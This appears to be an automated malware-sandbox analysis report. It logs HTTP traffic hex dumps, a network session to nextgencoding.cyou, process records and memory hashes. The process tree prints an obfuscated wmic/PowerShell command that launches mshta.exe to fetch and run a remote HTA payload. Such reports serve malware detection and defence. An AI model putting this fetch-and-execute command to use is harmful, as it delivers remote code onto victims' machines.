                                        2024-12-27 08:03:47 UTC1369INData Raw: 6c 64 28 32 6e 29 2c 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 63 6f 6c 75 6d 6e 73 2e 63 6f 6c 73 2d 34 3e 2e 63 66 2d 63 6f 6c 75 6d 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 32 6e 29 2c 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 63 6f 6c 75 6d 6e 73 2e 66 6f 75 72 3e 2e 63 66 2d 63 6f 6c 75 6d 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 32 6e 29 2c 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 63 6f 6c 75 6d 6e 73 2e 74 77 6f 3e 2e 63 66 2d 63 6f 6c 75 6d 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 32 6e 29 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 32 32 2e 35 70 78 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 63 6f 6c 75 6d 6e 73 2e 63 6f 6c 73 2d 32 3e 2e 63 66 2d 63 6f 6c 75 6d 6e 3a 6e 74 68 2d 63 68 69
                                        Data Ascii: ld(2n),#cf-wrapper .cf-columns.cols-4>.cf-column:nth-child(2n),#cf-wrapper .cf-columns.four>.cf-column:nth-child(2n),#cf-wrapper .cf-columns.two>.cf-column:nth-child(2n){padding-left:22.5px;padding-right:0}#cf-wrapper .cf-columns.cols-2>.cf-column:nth-chi
                                        2024-12-27 08:03:47 UTC1369INData Raw: 29 2c 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 63 6f 6c 75 6d 6e 73 2e 66 6f 75 72 3e 2e 63 66 2d 63 6f 6c 75 6d 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 6f 64 64 29 7b 63 6c 65 61 72 3a 6e 6f 6e 65 7d 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 63 6f 6c 75 6d 6e 73 2e 63 6f 6c 73 2d 34 3e 2e 63 66 2d 63 6f 6c 75 6d 6e 3a 66 69 72 73 74 2d 63 68 69 6c 64 2c 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 63 6f 6c 75 6d 6e 73 2e 63 6f 6c 73 2d 34 3e 2e 63 66 2d 63 6f 6c 75 6d 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 34 6e 2b 31 29 2c 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 63 6f 6c 75 6d 6e 73 2e 66 6f 75 72 3e 2e 63 66 2d 63 6f 6c 75 6d 6e 3a 66 69 72 73 74 2d 63 68 69 6c 64 2c 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 63 6f 6c 75 6d 6e 73
                                        Data Ascii: ),#cf-wrapper .cf-columns.four>.cf-column:nth-child(odd){clear:none}#cf-wrapper .cf-columns.cols-4>.cf-column:first-child,#cf-wrapper .cf-columns.cols-4>.cf-column:nth-child(4n+1),#cf-wrapper .cf-columns.four>.cf-column:first-child,#cf-wrapper .cf-columns
                                        2024-12-27 08:03:47 UTC1369INData Raw: 30 3b 70 61 64 64 69 6e 67 3a 30 7d 23 63 66 2d 77 72 61 70 70 65 72 20 68 31 2c 23 63 66 2d 77 72 61 70 70 65 72 20 68 32 2c 23 63 66 2d 77 72 61 70 70 65 72 20 68 33 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 7d 23 63 66 2d 77 72 61 70 70 65 72 20 68 34 2c 23 63 66 2d 77 72 61 70 70 65 72 20 68 35 2c 23 63 66 2d 77 72 61 70 70 65 72 20 68 36 2c 23 63 66 2d 77 72 61 70 70 65 72 20 73 74 72 6f 6e 67 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 36 30 30 7d 23 63 66 2d 77 72 61 70 70 65 72 20 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 33 36 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 32 7d 23 63 66 2d 77 72 61 70 70 65 72 20 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 33 30 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 33 7d 23 63 66 2d 77 72 61 70 70 65
                                        Data Ascii: 0;padding:0}#cf-wrapper h1,#cf-wrapper h2,#cf-wrapper h3{font-weight:400}#cf-wrapper h4,#cf-wrapper h5,#cf-wrapper h6,#cf-wrapper strong{font-weight:600}#cf-wrapper h1{font-size:36px;line-height:1.2}#cf-wrapper h2{font-size:30px;line-height:1.3}#cf-wrappe
                                        2024-12-27 08:03:47 UTC1369INData Raw: 68 32 2b 68 34 2c 23 63 66 2d 77 72 61 70 70 65 72 20 68 32 2b 68 35 2c 23 63 66 2d 77 72 61 70 70 65 72 20 68 32 2b 68 36 2c 23 63 66 2d 77 72 61 70 70 65 72 20 68 33 2b 68 35 2c 23 63 66 2d 77 72 61 70 70 65 72 20 68 33 2b 68 36 2c 23 63 66 2d 77 72 61 70 70 65 72 20 68 33 2b 70 2c 23 63 66 2d 77 72 61 70 70 65 72 20 68 34 2b 70 2c 23 63 66 2d 77 72 61 70 70 65 72 20 68 35 2b 6f 6c 2c 23 63 66 2d 77 72 61 70 70 65 72 20 68 35 2b 70 2c 23 63 66 2d 77 72 61 70 70 65 72 20 68 35 2b 75 6c 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2e 35 65 6d 7d 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 62 74 6e 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 39 39 39 3b 63 6f 6c
                                        Data Ascii: h2+h4,#cf-wrapper h2+h5,#cf-wrapper h2+h6,#cf-wrapper h3+h5,#cf-wrapper h3+h6,#cf-wrapper h3+p,#cf-wrapper h4+p,#cf-wrapper h5+ol,#cf-wrapper h5+p,#cf-wrapper h5+ul{margin-top:.5em}#cf-wrapper .cf-btn{background-color:transparent;border:1px solid #999;col
                                        2024-12-27 08:03:47 UTC1369INData Raw: 3a 23 36 32 61 31 64 38 3b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 31 36 33 39 35 39 3b 63 6f 6c 6f 72 3a 23 66 66 66 7d 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 2c 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 62 74 6e 2d 65 72 72 6f 72 2c 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 62 74 6e 2d 69 6d 70 6f 72 74 61 6e 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 62 64 32 34 32 36 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 63 6f 6c 6f 72 3a 23 66 66 66 7d 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 3a 68 6f 76 65 72 2c 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 62 74 6e 2d 65 72 72 6f 72 3a 68 6f 76 65 72 2c 23
                                        Data Ascii: :#62a1d8;border:1px solid #163959;color:#fff}#cf-wrapper .cf-btn-danger,#cf-wrapper .cf-btn-error,#cf-wrapper .cf-btn-important{background-color:#bd2426;border-color:transparent;color:#fff}#cf-wrapper .cf-btn-danger:hover,#cf-wrapper .cf-btn-error:hover,#
                                        2024-12-27 08:03:47 UTC1369INData Raw: 61 63 65 3a 6e 6f 77 72 61 70 7d 23 63 66 2d 77 72 61 70 70 65 72 20 69 6e 70 75 74 2c 23 63 66 2d 77 72 61 70 70 65 72 20 73 65 6c 65 63 74 2c 23 63 66 2d 77 72 61 70 70 65 72 20 74 65 78 74 61 72 65 61 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 21 69 6d 70 6f 72 74 61 6e 74 3b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 39 39 39 21 69 6d 70 6f 72 74 61 6e 74 3b 63 6f 6c 6f 72 3a 23 34 30 34 30 34 30 21 69 6d 70 6f 72 74 61 6e 74 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 36 36 36 37 65 6d 21 69 6d 70 6f 72 74 61 6e 74 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 32 34 21 69 6d 70 6f 72 74 61 6e 74 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 65 6d 21 69 6d 70 6f 72 74 61 6e 74 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 21 69 6d 70 6f 72 74 61 6e
                                        Data Ascii: ace:nowrap}#cf-wrapper input,#cf-wrapper select,#cf-wrapper textarea{background:#fff!important;border:1px solid #999!important;color:#404040!important;font-size:.86667em!important;line-height:1.24!important;margin:0 0 1em!important;max-width:100%!importan
                                        2024-12-27 08:03:47 UTC1369INData Raw: 3a 23 34 30 34 30 34 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 70 61 64 64 69 6e 67 3a 37 2e 35 70 78 20 31 35 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 6d 69 64 64 6c 65 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 32 70 78 7d 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 61 6c 65 72 74 3a 65 6d 70 74 79 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 61 6c 65 72 74 20 2e 63 66 2d 63 6c 6f 73 65 7b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 63 6f 6c 6f 72 3a 69 6e 68 65 72 69 74 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 38 2e 37 35 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 3b 70 61 64 64 69 6e
                                        Data Ascii: :#404040;font-size:13px;padding:7.5px 15px;position:relative;vertical-align:middle;border-radius:2px}#cf-wrapper .cf-alert:empty{display:none}#cf-wrapper .cf-alert .cf-close{border:1px solid transparent;color:inherit;font-size:18.75px;line-height:1;paddin


                                         Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                         2 | 192.168.2.4 | 49732 | 104.21.67.124 | 443 | 7944 | C:\Windows\System32\mshta.exe
                                         Timestamp | Bytes transferred | Direction | Data
                                         2024-12-27 08:03:48 UTC | 416 | OUT | GET /cdn-cgi/images/icon-exclamation.png?1376755637 HTTP/1.1
                                        Accept: */*
                                        Referer: https://nextgencoding.cyou/asd/amber3
                                        Accept-Language: en-CH
                                        UA-CPU: AMD64
                                        Accept-Encoding: gzip, deflate
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                        Host: nextgencoding.cyou
                                        Connection: Keep-Alive
                                         2024-12-27 08:03:49 UTC | 409 | IN | HTTP/1.1 200 OK
                                        Date: Fri, 27 Dec 2024 08:03:48 GMT
                                        Content-Type: image/png
                                        Content-Length: 452
                                        Connection: close
                                        Last-Modified: Mon, 16 Dec 2024 06:11:56 GMT
                                        ETag: "675fc4ac-1c4"
                                        Server: cloudflare
                                        CF-RAY: 8f87cbd6b9fe41bd-EWR
                                        X-Frame-Options: DENY
                                        X-Content-Type-Options: nosniff
                                        Expires: Fri, 27 Dec 2024 10:03:48 GMT
                                        Cache-Control: max-age=7200
                                        Cache-Control: public
                                        Accept-Ranges: bytes
                                        2024-12-27 08:03:49 UTC452INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 36 00 00 00 36 08 03 00 00 00 bb 9b 9a ef 00 00 00 33 50 4c 54 45 c1 45 3f c1 45 3f c1 45 3f c1 45 3f c1 45 3f c1 45 3f c1 45 3f c1 45 3f c1 45 3f c1 45 3f c1 45 3f c1 45 3f c1 45 3f c1 45 3f c1 45 3f c1 45 3f c1 45 3f ab b2 22 ed 00 00 00 11 74 52 4e 53 00 40 30 10 60 8f bf ff ef 7f af 9f df 20 50 cf 70 60 82 c8 9b 00 00 01 2f 49 44 41 54 78 01 bd d3 05 d2 b4 30 10 06 e1 8e 6c de c1 36 dc ff b2 9f 2b 95 c9 12 7e 79 4a 91 46 22 b8 c2 8b c8 80 94 6f 45 1f ac 4c 81 33 f2 ac 03 5b 1e 95 69 32 b5 94 6e 98 57 79 4a c4 91 8a 7a 26 9a 82 a9 af a4 46 95 f5 d0 1a fb 95 c7 62 bf b2 f2 e9 70 7e e3 a7 a0 df ee 7c 3a 74 35 f1 6d b3 b3 99 66 70 af 69 f2 2f 65 ef c7 fa 99 25 de 25 1b c9 b4 f0 6e d2 50 a6 ed fb 65
                                        Data Ascii: PNGIHDR663PLTEE?E?E?E?E?E?E?E?E?E?E?E?E?E?E?E?E?"tRNS@0` Pp`/IDATx0l6+~yJF"oEL3[i2nWyJz&Fbp~|:t5mfpi/e%%nPe



                                        Target ID:0
                                        Start time:03:03:39
                                        Start date:27/12/2024
                                        Path:C:\Windows\System32\wbem\WMIC.exe
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Windows\System32\Wbem\wmic.exe" process call create "powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://nextgencoding.cyou/asd/amber3')"
                                        Imagebase:0x7ff6660f0000
                                        File size:576'000 bytes
                                        MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:1
                                        Start time:03:03:39
                                        Start date:27/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:2
                                        Start time:03:03:39
                                        Start date:27/12/2024
                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        Wow64 process (32bit):false
                                        Commandline:powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://nextgencoding.cyou/asd/amber3')
                                        Imagebase:0x7ff788560000
                                        File size:452'608 bytes
                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:3
                                        Start time:03:03:39
                                        Start date:27/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:4
                                        Start time:03:03:41
                                        Start date:27/12/2024
                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta.exe https://nextgencoding.cyou/asd/amber3"
                                        Imagebase:0x7ff788560000
                                        File size:452'608 bytes
                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:5
                                        Start time:03:03:42
                                        Start date:27/12/2024
                                        Path:C:\Windows\System32\mshta.exe
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Windows\system32\mshta.exe" https://nextgencoding.cyou/asd/amber3
                                        Imagebase:0x7ff6f58c0000
                                        File size:14'848 bytes
                                        MD5 hash:0B4340ED812DC82CE636C00FA5C9BEF2
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:moderate
                                        Has exited:false

                                        Target ID:6
                                        Start time:03:03:46
                                        Start date:27/12/2024
                                        Path:C:\Windows\System32\svchost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                        Imagebase:0x7ff6eef20000
                                        File size:55'320 bytes
                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:false

                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1686649639.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_7ffd9b7d0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                          • Instruction ID: 7d18de3127f3f1dd01fd625624dbb9d3bcbd9e505403495affb5961ee0d50b6a
                                          • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                          • Instruction Fuzzy Hash: 4D01A73020CB0C4FD748EF0CE051AA5B3E0FB85360F10066DE58AC36A1DA32E882CB41
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.2912923984.00000288379D0000.00000010.00000800.00020000.00000000.sdmp, Offset: 00000288379D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_288379d0000_mshta.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 810f81081c0cb5d300cc3b36cee436ae8f7401916ad1b7d2a8efc543ff71aa18
                                          • Instruction ID: 696fd1b49e0748163d0d9c60f92335e08578f75731fccc4ad935dab5d26c3f8b
                                          • Opcode Fuzzy Hash: 810f81081c0cb5d300cc3b36cee436ae8f7401916ad1b7d2a8efc543ff71aa18
                                          • Instruction Fuzzy Hash: 6290020849640A55D41421990C8A29C5040A388550FE585E0481690145DC8D46961262